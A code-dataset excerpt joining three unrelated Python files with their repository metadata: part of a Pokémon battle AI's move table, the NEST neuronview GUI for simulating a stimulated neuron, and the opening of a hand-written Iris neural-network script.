power=80,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Recover": HealingMove("Recover",
category="Non-Damaging",
type="Normal",
healing_percent=0.5),
"Recycle": Move("Recycle",
category="Non-Damaging",
type="Normal"),
"Reflect": Move("Reflect",
category="Non-Damaging",
type="Psychic"),
"Reflect Type": Move("Reflect Type",
category="Non-Damaging",
type="Normal"),
"Refresh": Move("Refresh",
category="Non-Damaging",
type="Normal"),
"Relic Song": DamagingMove("Relic Song",
power=75,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000,
handler=handle_relic_song),
"Rest": Move("Rest",
category="Non-Damaging",
type="Psychic"),
"Retaliate": DamagingMove("Retaliate",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Return": DamagingMove("Return",
power=102,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Revenge": DamagingMove("Revenge",
power=60,
category="Physical",
priority=-4,
type="Fighting",
accuracy=1.000000),
"Reversal": DamagingMove("Reversal",
power=0,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Roar": Move("Roar",
category="Non-Damaging",
type="Normal"),
"Roar of Time": DamagingMove("Roar of Time",
power=150,
category="Special",
priority=0,
type="Dragon",
accuracy=0.900000),
"Rock Blast": DamagingMove("Rock Blast",
power=25,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Rock Climb": DamagingMove("Rock Climb",
power=90,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Rock Polish": BoostingMove("Rock Polish",
category="Non-Damaging",
type="Rock",
boosts={
'spe': 2
}),
"Rock Slide": DamagingMove("Rock Slide",
power=75,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Rock Smash": DamagingMove("Rock Smash",
power=40,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Rock Throw": DamagingMove("Rock Throw",
power=50,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Rock Tomb": DamagingMove("Rock Tomb",
power=60,
category="Physical",
priority=0,
type="Rock",
accuracy=0.950000),
"Rock Wrecker": DamagingMove("Rock Wrecker",
power=150,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Role Play": Move("Role Play",
category="Non-Damaging",
type="Psychic"),
"Rolling Kick": DamagingMove("Rolling Kick",
power=60,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.850000),
"Rollout": DamagingMove("Rollout",
power=30,
category="Physical",
priority=0,
type="Rock",
accuracy=0.900000),
"Roost": HealingMove("Roost",
category="Non-Damaging",
type="Flying",
healing_percent=0.5),
"Rototiller": Move("Rototiller",
category="Non-Damaging",
type="Ground"),
"Round": DamagingMove("Round",
power=60,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Sacred Fire": DamagingMove("Sacred Fire",
power=100,
category="Physical",
priority=0,
type="Fire",
accuracy=0.950000),
"Sacred Sword": DamagingMove("Sacred Sword",
power=90,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Safeguard": Move("Safeguard",
category="Non-Damaging",
type="Normal"),
"Sand Attack": Move("Sand Attack",
category="Non-Damaging",
type="Ground"),
"Sand Tomb": DamagingMove("Sand Tomb",
power=35,
category="Physical",
priority=0,
type="Ground",
accuracy=0.850000),
"Sandstorm": Move("Sandstorm",
category="Non-Damaging",
type="Rock"),
"Scald": DamagingMove("Scald",
power=80,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Scary Face": Move("Scary Face",
category="Non-Damaging",
type="Normal"),
"Scratch": DamagingMove("Scratch",
power=40,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Screech": Move("Screech",
category="Non-Damaging",
type="Normal"),
"Searing Shot": DamagingMove("Searing Shot",
power=100,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Secret Power": DamagingMove("Secret Power",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Secret Sword": DamagingMove("Secret Sword",
power=85,
category="Special",
priority=0,
type="Fighting",
accuracy=1.000000),
"Seed Bomb": DamagingMove("Seed Bomb",
power=80,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Seed Flare": DamagingMove("Seed Flare",
power=120,
category="Special",
priority=0,
type="Grass",
accuracy=0.850000),
"Seismic Toss": DamagingMove("Seismic Toss",
power=0,
category="Physical",
priority=0,
type="Fighting",
handler=handle_seismic_toss,
accuracy=1.000000),
"Self-Destruct": DamagingMove("Self-Destruct",
power=200,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Shadow Ball": DamagingMove("Shadow Ball",
power=80,
category="Special",
priority=0,
type="Ghost",
accuracy=1.000000),
"Shadow Claw": DamagingMove("Shadow Claw",
power=70,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Shadow Force": DamagingMove("Shadow Force",
power=120,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Shadow Punch": DamagingMove("Shadow Punch",
power=60,
category="Physical",
priority=0,
type="Ghost",
accuracy=0.000000),
"Shadow Sneak": DamagingMove("Shadow Sneak",
power=40,
category="Physical",
priority=1,
type="Ghost",
accuracy=1.000000),
"Sharpen": BoostingMove("Sharpen",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1
}),
"Sheer Cold": DamagingMove("Sheer Cold",
power=0,
category="Special",
priority=0,
type="Ice",
accuracy=0.300000),
"Shell Smash": BoostingMove("Shell Smash",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 2,
'spatk': 2,
'spe': 2,
'pdef': -1,
'spdef': -1
}),
"Shift Gear": BoostingMove("Shift Gear",
category="Non-Damaging",
type="Steel",
boosts={
'patk': 1,
'spe': 2
}),
"Shock Wave": DamagingMove("Shock Wave",
power=60,
category="Special",
priority=0,
type="Electric",
accuracy=0.000000),
"Signal Beam": DamagingMove("Signal Beam",
power=75,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Silver Wind": DamagingMove("Silver Wind",
power=60,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Simple Beam": Move("Simple Beam",
category="Non-Damaging",
type="Normal"),
"Sing": Move("Sing",
category="Non-Damaging",
type="Normal"),
"Sketch": Move("Sketch",
category="Non-Damaging",
type="Normal"),
"Skill Swap": Move("Skill Swap",
category="Non-Damaging",
type="Psychic"),
"Skull Bash": DamagingMove("Skull Bash",
power=130,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Sky Attack": DamagingMove("Sky Attack",
power=140,
category="Physical",
priority=0,
type="Flying",
accuracy=0.900000),
"Sky Drop": DamagingMove("Sky Drop",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Sky Uppercut": DamagingMove("Sky Uppercut",
power=85,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Slack Off": HealingMove("Slack Off",
category="Non-Damaging",
type="Normal",
healing_percent=0.5),
"Slam": DamagingMove("Slam",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=0.750000),
"Slash": DamagingMove("Slash",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Sleep Powder": Move("Sleep Powder",
category="Non-Damaging",
type="Grass"),
"Sleep Talk": Move("Sleep Talk",
category="Non-Damaging",
type="Normal"),
"Sludge": DamagingMove("Sludge",
power=65,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Sludge Bomb": DamagingMove("Sludge Bomb",
power=90,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Sludge Wave": DamagingMove("Sludge Wave",
power=95,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Smack Down": DamagingMove("Smack Down",
power=50,
category="Physical",
priority=0,
type="Rock",
accuracy=1.000000),
"Smelling Salts": DamagingMove("Smelling Salts",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Smog": DamagingMove("Smog",
power=30,
category="Special",
priority=0,
type="Poison",
accuracy=0.700000),
"Smokescreen": Move("Smokescreen",
category="Non-Damaging",
type="Normal"),
"Snarl": DamagingMove("Snarl",
power=55,
category="Special",
priority=0,
type="Dark",
accuracy=0.950000),
"Snatch": Move("Snatch",
category="Non-Damaging",
type="Dark"),
"Snore": DamagingMove("Snore",
power=50,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Soak": Move("Soak",
category="Non-Damaging",
type="Water"),
"Soft-Boiled": HealingMove("Soft-Boiled",
category="Non-Damaging",
type="Normal",
healing_percent=0.5),
"Solar Beam": DamagingMove("Solar Beam",
power=120,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Sonic Boom": DamagingMove("Sonic Boom",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=0.900000),
"Spacial Rend": DamagingMove("Spacial Rend",
power=100,
category="Special",
priority=0,
type="Dragon",
accuracy=0.950000),
"Spark": DamagingMove("Spark",
power=65,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Spider Web": Move("Spider Web",
category="Non-Damaging",
type="Bug"),
"Spike Cannon": DamagingMove("Spike Cannon",
power=20,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Spikes": Move("Spikes",
category="Non-Damaging",
type="Ground",
handler=handle_spikes),
"Spiky Shield": Move("Spiky Shield",
category="Non-Damaging",
type="Grass"),
"Spit Up": DamagingMove("Spit Up",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Spite": Move("Spite",
category="Non-Damaging",
type="Ghost"),
"Splash": Move("Splash",
category="Non-Damaging",
type="Normal"),
"Spore": Move("Spore",
category="Non-Damaging",
type="Grass"),
"Stealth Rock": Move("Stealth Rock",
category="Non-Damaging",
type="Rock",
handler=handle_stealth_rock),
"Steam Eruption": DamagingMove("Steam Eruption",
power=110,
category="Special",
priority=0,
type="Water",
accuracy=0.950000),
"Steamroller": DamagingMove("Steamroller",
power=65,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Steel Wing": DamagingMove("Steel Wing",
power=70,
category="Physical",
priority=0,
type="Steel",
accuracy=0.900000),
"Sticky Web": Move("Sticky Web",
category="Non-Damaging",
type="Bug"),
"Stockpile": Move("Stockpile",
category="Non-Damaging",
type="Normal"),
"Stomp": DamagingMove("Stomp",
power=65,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Stone Edge": DamagingMove("Stone Edge",
power=100,
category="Physical",
priority=0,
type="Rock",
accuracy=0.800000),
"Stored Power": DamagingMove("Stored Power",
power=0,
power_handler=power_stored_power,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Storm Throw": DamagingMove("Storm Throw",
power=60,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Strength": DamagingMove("Strength",
power=80,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"String Shot": Move("String Shot",
category="Non-Damaging",
type="Bug"),
"Struggle": DamagingMove("Struggle",
power=50,
category="Physical",
priority=0,
type="Normal",
accuracy=0.000000),
"Struggle Bug": DamagingMove("Struggle Bug",
power=50,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Stun Spore": Move("Stun Spore",
category="Non-Damaging",
type="Grass"),
"Submission": DamagingMove("Submission",
power=80,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.800000),
"Substitute": Move("Substitute",
category="Non-Damaging",
type="Normal"),
"Sucker Punch": DamagingMove("Sucker Punch",
power=80,
category="Physical",
priority=1,
type="Dark",
accuracy=1.000000),
"Sunny Day": Move("Sunny Day",
category="Non-Damaging",
type="Fire"),
"Super Fang": DamagingMove("Super Fang",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Superpower": DamagingMove("Superpower",
power=120,
category="Physical",
priority=0,
type="Fighting",
handler=handle_superpower,
accuracy=1.000000),
"Supersonic": Move("Supersonic",
category="Non-Damaging",
type="Normal"),
"Surf": DamagingMove("Surf",
power=90,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Swagger": Move("Swagger",
category="Non-Damaging",
type="Normal"),
"Swallow": Move("Swallow",
category="Non-Damaging",
type="Normal"),
"Sweet Kiss": Move("Sweet Kiss",
category="Non-Damaging",
type="Fairy"),
"Sweet Scent": Move("Sweet Scent",
category="Non-Damaging",
type="Normal"),
"Swift": DamagingMove("Swift",
power=60,
category="Special",
priority=0,
type="Normal",
accuracy=0.000000),
"Switcheroo": Move("Switcheroo",
category="Non-Damaging",
type="Dark"),
"Swords Dance": BoostingMove("Swords Dance",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 2
}),
"Synchronoise": DamagingMove("Synchronoise",
power=120,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Synthesis": HealingMove("Synthesis",
category="Non-Damaging",
type="Grass",
healing_percent=0.5),
"Tackle": DamagingMove("Tackle",
power=50,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Tail Glow": BoostingMove("Tail Glow",
category="Non-Damaging",
type="Bug",
boosts={
'spatk': 3
}),
"Tail Slap": DamagingMove("Tail Slap",
power=25,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Tail Whip": Move("Tail Whip",
category="Non-Damaging",
type="Normal"),
"Tailwind": Move("Tailwind",
category="Non-Damaging",
type="Flying"),
"Take Down": DamagingMove("Take Down",
power=90,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Taunt": Move("Taunt",
category="Non-Damaging",
type="Dark"),
"Techno Blast": DamagingMove("Techno Blast",
power=120,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Teeter Dance": Move("Teeter Dance",
category="Non-Damaging",
type="Normal"),
"Telekinesis": Move("Telekinesis",
category="Non-Damaging",
type="Psychic"),
"Teleport": Move("Teleport",
category="Non-Damaging",
type="Psychic"),
"Thief": DamagingMove("Thief",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Thousand Arrows": DamagingMove("Thousand Arrows",
power=90,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Thousand Waves": DamagingMove("Thousand Waves",
power=90,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Thrash": DamagingMove("Thrash",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Thunder": DamagingMove("Thunder",
power=110,
category="Special",
priority=0,
type="Electric",
accuracy=0.700000),
"Thunder Fang": DamagingMove("Thunder Fang",
power=65,
category="Physical",
priority=0,
type="Electric",
accuracy=0.950000),
"Thunder Punch": DamagingMove("Thunder Punch",
power=75,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Thunder Shock": DamagingMove("Thunder Shock",
power=40,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Thunder Wave": Move("Thunder Wave",
category="Non-Damaging",
type="Electric",
handler=handle_thunder_wave),
"Thunderbolt": DamagingMove("Thunderbolt",
power=90,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Tickle": Move("Tickle",
category="Non-Damaging",
type="Normal"),
"Topsy-Turvy": Move("Topsy-Turvy",
category="Non-Damaging",
type="Dark"),
"Torment": Move("Torment",
category="Non-Damaging",
type="Dark"),
"Toxic": Move("Toxic",
category="Non-Damaging",
type="Poison"),
"Toxic Spikes": Move("Toxic Spikes",
category="Non-Damaging",
type="Poison"),
"Transform": Move("Transform",
category="Non-Damaging",
type="Normal"),
"Tri Attack": DamagingMove("Tri Attack",
power=80,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Trick": Move("Trick",
category="Non-Damaging",
type="Psychic"),
"Trick Room": Move("Trick Room",
category="Non-Damaging",
type="Psychic"),
"Trick-or-Treat": Move("Trick-or-Treat",
category="Non-Damaging",
type="Ghost"),
"Triple Kick": DamagingMove("Triple Kick",
power=10,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.900000),
"Trump Card": DamagingMove("Trump Card",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=0.000000),
"Twineedle": DamagingMove("Twineedle",
power=25,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Twister": DamagingMove("Twister",
power=40,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"U-turn": DamagingMove("U-turn",
power=70,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Uproar": DamagingMove("Uproar",
power=90,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"V-create": DamagingMove("V-create",
power=180,
category="Physical",
priority=0,
type="Fire",
accuracy=0.950000,
handler=handle_vcreate),
"Vacuum Wave": DamagingMove("Vacuum Wave",
power=40,
category="Special",
priority=1,
type="Fighting",
accuracy=1.000000),
"Venom Drench": Move("Venom Drench",
category="Non-Damaging",
type="Poison"),
"Venoshock": DamagingMove("Venoshock",
power=65,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Vice Grip": DamagingMove("Vice Grip",
power=55,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Vine Whip": DamagingMove("Vine Whip",
power=45,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Vital Throw": DamagingMove("Vital Throw",
power=70,
category="Physical",
priority=-1,
type="Fighting",
accuracy=0.000000),
"Volt Switch": DamagingMove("Volt Switch",
power=70,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Volt Tackle": DamagingMove("Volt Tackle",
power=120,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Wake-Up Slap": DamagingMove("Wake-Up Slap",
power=70,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Water Gun": DamagingMove("Water Gun",
power=40,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Water Pledge": DamagingMove("Water Pledge",
power=80,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Water Pulse": DamagingMove("Water Pulse",
power=60,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Water Shuriken": DamagingMove("Water Shuriken",
power=15,
category="Physical",
priority=1,
type="Water",
accuracy=1.000000),
"Water Sport": Move("Water Sport",
category="Non-Damaging",
type="Water"),
"Water Spout": DamagingMove("Water Spout",
power=150,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Waterfall": DamagingMove("Waterfall",
power=80,
category="Physical",
priority=0,
type="Water",
accuracy=1.000000),
"Weather Ball": DamagingMove("Weather Ball",
power=50,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Whirlpool": DamagingMove("Whirlpool",
power=35,
category="Special",
priority=0,
type="Water",
accuracy=0.850000),
"Whirlwind": Move("Whirlwind",
category="Non-Damaging",
type="Normal"),
"Wide Guard": Move("Wide Guard",
category="Non-Damaging",
type="Rock"),
"Wild Charge": DamagingMove("Wild Charge",
power=90,
category="Physical",
priority=0,
type="Electric",
accuracy=1.000000),
"Will-O-Wisp": Move("Will-O-Wisp",
category="Non-Damaging",
type="Fire",
handler=handle_willowisp),
"Wing Attack": DamagingMove("Wing Attack",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Wish": Move("Wish",
category="Non-Damaging",
type="Normal"),
"Withdraw": BoostingMove("Withdraw",
category="Non-Damaging",
type="Water",
boosts={
'pdef': 1
}),
"Wonder Room": Move("Wonder Room",
category="Non-Damaging",
type="Psychic"),
"Wood Hammer": DamagingMove("Wood Hammer",
power=120,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Work Up": BoostingMove("Work Up",
category="Non-Damaging",
type="Normal",
boosts={
'patk': 1,
'spatk': 1
}),
"Worry Seed": Move("Worry Seed",
category="Non-Damaging",
type="Grass"),
"Wrap": DamagingMove("Wrap",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Wring Out": DamagingMove("Wring Out",
power=0,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"X-Scissor": DamagingMove("X-Scissor",
power=80,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Yawn": Move("Yawn",
category="Non-Damaging",
type="Normal"),
"Zap Cannon": DamagingMove("Zap Cannon",
power=120,
category="Special",
priority=0,
type="Electric",
accuracy=0.500000),
"Zen Headbutt": DamagingMove("Zen Headbutt",
power=80,
category="Physical",
priority=0,
type="Psychic",
accuracy=0.900000),
}
|
vasumv/pokemon_ai
|
showdownai/move_list.py
|
Python
|
mit
| 135,020
|
[
"BLAST"
] |
e47ea03d31986b263aab701de68443c59e15b6c9d536a3438f71e1e493026417
|
# -*- coding: utf-8 -*-
#
# neuronview.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
import pygtk
pygtk.require('2.0')
import gtk
import pango
import gobject
from matplotlib.figure import Figure
from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas
import matplotlib.gridspec as gridspec
import os
import nest
default_neuron = "iaf_neuron"
default_stimulator = "dc_generator"
class Main() :
def __init__(self):
self._gladefile = "neuronview.glade"
self._builder = gtk.Builder()
self._builder.add_from_file(self._gladefile)
self._builder.connect_signals(self)
self._win = self._builder.get_object("mainwindow")
self._win.resize(900, 700)
box = self._builder.get_object("box5")
self._stimulatordictview = DictView()
self._builder.get_object("scrolledwindow2").add(self._stimulatordictview)
box = self._builder.get_object("box4")
self._neurondictview = DictView()
self._builder.get_object("scrolledwindow3").add(self._neurondictview)
self.populate_comboboxes()
self._figure = Figure(figsize=(5,4), dpi=100)
canvas = FigureCanvas(self._figure)
canvas.set_size_request(200, 250)
canvas.show()
box = self._builder.get_object("box3")
bg_style = box.get_style().bg[gtk.STATE_NORMAL]
gtk_color = (bg_style.red_float, bg_style.green_float, bg_style.blue_float)
self._figure.set_facecolor(gtk_color)
box.pack_start(canvas)
self._win.show()
gtk.main()
def update_figure(self, spikes, potentials):
if nest.GetKernelStatus("time") != 0.0:
self._figure.clear()
# num_figures = (len(spikes) != 0) + (len(potentials) != 0)
# fig_num = 1
gs = gridspec.GridSpec(2, 1, height_ratios=[1, 4])
ax0 = self._figure.add_subplot(gs[0])
ax0.plot(spikes[0]["times"], [1]*len(spikes[0]["times"]), ".")
ax0.set_yticks([])
ax0.set_xticks([])
ax1 = self._figure.add_subplot(gs[1])
ax1.plot(potentials[0]["times"], potentials[0]["V_m"], "r-")
ax1.set_ylabel("$V_m$ (mV)")
ax1.set_xlabel("time (s)")
# plt.tight_layout()
self._figure.canvas.draw()
def filter_statusdict(self, params):
for key in ["archiver_length", "available", "capacity",
"elementsize", "frozen", "global_id",
"instantiations", "is_refractory", "local",
"model", "element_type", "offset", "origin",
"receptor_types", "recordables",
"refractory_input", "rmax", "state", "t_spike",
"thread", "tlast", "tspike", "type_id", "vp",
"ymod"]:
if key in params.keys():
params.pop(key)
def populate_comboboxes(self):
neuronmodels = self._builder.get_object("neuronmodels")
neuronmodelsliststore = neuronmodels.get_model()
stimulatormodels = self._builder.get_object("stimulatormodels")
stimulatormodelsliststore = stimulatormodels.get_model()
neuron_it = None
stimulator_it = None
models = nest.Models("nodes")
models = [x for x in models if x not in ["correlation_detector", "sli_neuron",
"iaf_psc_alpha_norec", "parrot_neuron", "parrot_neuron_ps"]]
for entry in models:
try:
entrytype = nest.GetDefaults(entry)["element_type"]
except:
entrytype = "unknown"
if entrytype == "neuron":
it = neuronmodelsliststore.append([entry])
if entry == default_neuron: neuron_it = it
elif entrytype == "stimulator":
it = stimulatormodelsliststore.append([entry])
if entry == default_stimulator: stimulator_it = it
cell = gtk.CellRendererText()
neuronmodels.pack_start(cell, True)
neuronmodels.add_attribute(cell, 'text', 0)
neuronmodels.set_active_iter(neuron_it)
stimulatormodels.pack_start(cell, True)
stimulatormodels.add_attribute(cell, 'text', 0)
stimulatormodels.set_active_iter(stimulator_it)
docviewcombo = self._builder.get_object("docviewcombo")
docviewcomboliststore = docviewcombo.get_model()
docviewcomboliststore.append(["Stimulating device"])
it = docviewcomboliststore.append(["Neuron"])
docviewcombo.pack_start(cell, True)
docviewcombo.add_attribute(cell, 'text', 0)
docviewcombo.set_active_iter(it)
def get_help_text(self, name):
nest.sli_run("statusdict /prgdocdir get")
docdir = nest.sli_pop()
helptext = "No documentation available"
for subdir in ["cc", "sli"]:
filename = os.path.join(docdir, "help", subdir, name + ".hlp")
if os.path.isfile(filename):
helptext = open(filename, 'r').read()
return helptext
def on_model_selected(self, widget):
liststore = widget.get_model()
model = liststore.get_value(widget.get_active_iter(), 0)
statusdict = nest.GetDefaults(model)
self.filter_statusdict(statusdict)
if widget == self._builder.get_object("neuronmodels"):
self._neurondictview.set_params(statusdict)
if widget == self._builder.get_object("stimulatormodels"):
self._stimulatordictview.set_params(statusdict)
self.on_doc_selected(self._builder.get_object("docviewcombo"))
def on_doc_selected(self, widget):
liststore = widget.get_model()
doc = liststore.get_value(widget.get_active_iter(), 0)
docview = self._builder.get_object("docview")
docbuffer = gtk.TextBuffer()
if doc == "Neuron":
combobox = self._builder.get_object("neuronmodels")
if doc == "Stimulating device":
combobox = self._builder.get_object("stimulatormodels")
liststore = combobox.get_model()
model = liststore.get_value(combobox.get_active_iter(), 0)
docbuffer.set_text(self.get_help_text(model))
docview.set_buffer(docbuffer)
docview.modify_font(pango.FontDescription("monospace 10"))
def on_simulate_clicked(self, widget):
nest.ResetKernel()
combobox = self._builder.get_object("stimulatormodels")
liststore = combobox.get_model()
stimulatormodel = liststore.get_value(combobox.get_active_iter(), 0)
params = self._stimulatordictview.get_params()
stimulator = nest.Create(stimulatormodel, params=params)
combobox = self._builder.get_object("neuronmodels")
liststore = combobox.get_model()
neuronmodel = liststore.get_value(combobox.get_active_iter(), 0)
neuron = nest.Create(neuronmodel, params=self._neurondictview.get_params())
weight = self._builder.get_object("weight").get_value()
delay = self._builder.get_object("delay").get_value()
nest.Connect(stimulator, neuron, weight, delay)
sd = nest.Create("spike_detector", params={"record_to": ["memory"]})
nest.Connect(neuron, sd)
vm = nest.Create("voltmeter", params={"record_to": ["memory"],
"interval": 0.1})
nest.Connect(vm, neuron)
simtime = self._builder.get_object("simtime").get_value()
nest.Simulate(simtime)
self.update_figure(nest.GetStatus(sd, "events"), nest.GetStatus(vm, "events"))
def on_delete_event(self, widget, event):
self.on_quit(widget)
return True
def on_quit(self, project):
self._builder.get_object("mainwindow").hide()
gtk.main_quit()
class DictView(gtk.TreeView) :
def __init__(self, params = None) :
gtk.TreeView.__init__(self)
if params:
self.params = params
self.repopulate()
renderer = gtk.CellRendererText()
column = gtk.TreeViewColumn("Name", renderer, text=1)
self.append_column(column)
renderer = gtk.CellRendererText()
renderer.set_property("mode", gtk.CELL_RENDERER_MODE_EDITABLE)
renderer.set_property("editable", True)
column = gtk.TreeViewColumn("Value", renderer, text=2)
self.append_column(column)
self.set_size_request(200, 150)
renderer.connect("edited", self.check_value)
self.show()
def repopulate(self) :
model = gtk.TreeStore(gobject.TYPE_PYOBJECT, gobject.TYPE_STRING, gobject.TYPE_STRING)
for key in sorted(self.params.keys()) :
pos = model.insert_after(None, None)
data = {"key" : key, "element_type" : type(self.params[key])}
model.set_value(pos, 0, data)
model.set_value(pos, 1, str(key))
model.set_value(pos, 2, str(self.params[key]))
self.set_model(model)
def check_value(self, widget, path, new_text) :
model = self.get_model()
data = model[path][0]
try :
typename = data["element_type"].__name__
new_value = eval("%s('%s')" % (typename, new_text))
if typename == "bool" and new_text.lower() in ["false", "0"] :
new_value = False
self.params[data["key"]] = new_value
model[path][2] = str(new_value)
except ValueError :
old_value = self.params[data["key"]]
model[path][2] = str(old_value)
def get_params(self) :
return self.params
def set_params(self, params) :
self.params = params
self.repopulate()
if __name__ == "__main__" :
Main()
|
magnastrazh/NEUCOGAR
|
nest/serotonin/research/C/nest-2.10.0/examples/neuronview/neuronview.py
|
Python
|
gpl-2.0
| 10,544
|
[
"NEURON"
] |
317cbfbd2fa614d5a331e1eff079e10bc75f9f1a2c4c202b17207b9ca6cdc2ab
|
from __future__ import print_function
from builtins import range
"""
SECTION 1 : Load and setup data for training
"""
import csv
import random
import math
random.seed(113)
# Load dataset
with open('../Datasets/iris/iris.csv') as csvfile:
csvreader = csv.reader(csvfile)
next(csvreader, None) # skip header
dataset = list(csvreader)
# Change string value to numeric
for row in dataset:
row[4] = ["Iris-setosa", "Iris-versicolor", "Iris-virginica"].index(row[4])
row[:4] = [float(row[j]) for j in range(len(row))]
# Split x and y (feature and target)
random.shuffle(dataset)
datatrain = dataset[:int(len(dataset) * 0.8)]
datatest = dataset[int(len(dataset) * 0.8):]
train_X = [data[:4] for data in datatrain]
train_y = [data[4] for data in datatrain]
test_X = [data[:4] for data in datatest]
test_y = [data[4] for data in datatest]
"""
SECTION 2 : Build and Train Model
Multilayer perceptron model, with one hidden layer.
input layer : 4 neuron, represents the feature of Iris
hidden layer : 3 neuron, activation using sigmoid
output layer : 3 neuron, represents the class of Iris
optimizer = gradient descent
loss function = Square ROot Error
learning rate = 0.005
epoch = 400
best result = 96.67%
"""
def matrix_mul_bias(A, B, bias): # Matrix multiplication (for Testing)
C = [[0 for i in range(len(B[0]))] for i in range(len(A))]
for i in range(len(A)):
for j in range(len(B[0])):
for k in range(len(B)):
C[i][j] += A[i][k] * B[k][j]
C[i][j] += bias[j]
return C
def vec_mat_bias(A, B, bias): # Vector (A) x matrix (B) multiplication
C = [0 for i in range(len(B[0]))]
for j in range(len(B[0])):
for k in range(len(B)):
C[j] += A[k] * B[k][j]
C[j] += bias[j]
return C
